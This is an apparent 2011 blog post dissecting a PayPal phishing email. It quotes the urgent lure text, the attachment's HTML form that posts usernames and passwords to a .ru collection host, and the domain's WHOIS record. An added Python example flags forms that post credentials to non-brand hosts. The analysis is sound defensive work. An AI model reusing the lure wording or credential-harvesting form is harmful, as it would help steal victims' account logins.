08 September 2011

[Analysis] PayPal phishing mail

Opened my mailbox and saw a mail from PayPal users@intl187.pays.com, so I downloaded it to ramble about it here.
 Its content:
Notification level: Urgent

Dear Valued Member,

Recently, our system detected unusual charges to a credit card linked to your PayPal account.

Access to your account was limited for the following reason:

                 There are activities of which someone tried to access your PayPal account without
your permission. To ensure greater security, we have limited access to your account. We have sent
you an attachment which contains all the necessary steps in order to restore your account access.
Please download and open it in your browser.

(The locator for this reason is PP-575-223-906)

                 We thank you for your prompt attention to this matter. Please understand that this
is a security measure intended to protect you and your account. We apologise for any inconvenience.

Thank you,
PayPal Account Review Department

It reeks :))
There are 2 of them, so I downloaded them to play around :))
  I wonder whether there are still many suckers around these days? :))
Download, View source

Found the most important line :))
<form name="frm" action="http://yqrrhqmqkqqqpbqsrhhllpplhkqsqqabwqqshphlplhplqhlpl.zuprionaskoliliasnoxikcmrnmn.ru/syscall.php" method="post" onsubmit="return validate(this)">
<input type="hidden" id="swich" name="swich" value="0"><input type="hidden" name="user" value=""><input type="hidden" name="pass" value=""><input type="hidden" name="defaultaddress" value=""><input type="hidden" name="ip" value=""><input type="hidden" name="send" value="">
 Poking around a bit more at this pile of WORMS gives:

Network (AS51632 INET iNet Ltd.)
% By submitting a query to RIPN's Whois Service
% you agree to abide by the following terms of use:
% http://www.ripn.net/about/servpol.html#3.2 (in Russian) 
% http://www.ripn.net/about/en/servpol.html#3.2 (in English).

nserver:    ns1.nameself.com.
nserver:    ns2.nameself.com.
person:     Private Person
e-mail:     contacts@ss.hk
registrar:  REGTIME-REG-RIPN
created:    2011.07.12
paid-till:  2012.07.12
source:     TCI

Last updated on 2011.09.05 19:55:46 MSK/MSD
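
The manual check above (view the attachment's source, read where its form posts) can be automated. This is an added Python example, not code from the original post; the brand-domain list, the credential field names and the sample form with its `.example` host are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: domains the claimed sender legitimately uses.
BRAND_DOMAINS = ("paypal.com",)
# Assumption: input names that suggest credential collection.
CREDENTIAL_FIELDS = {"user", "pass", "password", "login", "email"}

# Constructed sample attachment; the host is a placeholder, not a real indicator.
SAMPLE = ('<form name="frm" action="http://paypal.com.collector.example/syscall.php" '
          'method="post"><input type="hidden" name="user" value="">'
          '<input type="hidden" name="pass" value=""></form>')


class FormAudit(HTMLParser):
    """Collect each <form>'s action URL and the names of its <input> fields."""

    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "fields": []})
        elif tag == "input" and self.forms:
            self.forms[-1]["fields"].append((a.get("name") or "").lower())


def host_in_brand(host, brand_domains=BRAND_DOMAINS):
    """True only for the brand domain itself or a real subdomain of it."""
    host = (host or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in brand_domains)


def audit_attachment(html):
    """Return one finding per form that posts to a non-brand host."""
    parser = FormAudit()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        host = urlparse(form["action"]).hostname
        if host is None or host_in_brand(host):
            continue  # relative action or brand host: not flagged by this check
        creds = sorted(CREDENTIAL_FIELDS & set(form["fields"]))
        findings.append({"host": host, "credential_fields": creds})
    return findings


if __name__ == "__main__":
    print(audit_attachment(SAMPLE))
```

The suffix match on "." + domain is what keeps a host that merely starts with the brand name, like the one in the sample, from passing as the brand.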

 Stay alert, everyone :)).
Also, here is a bonus:


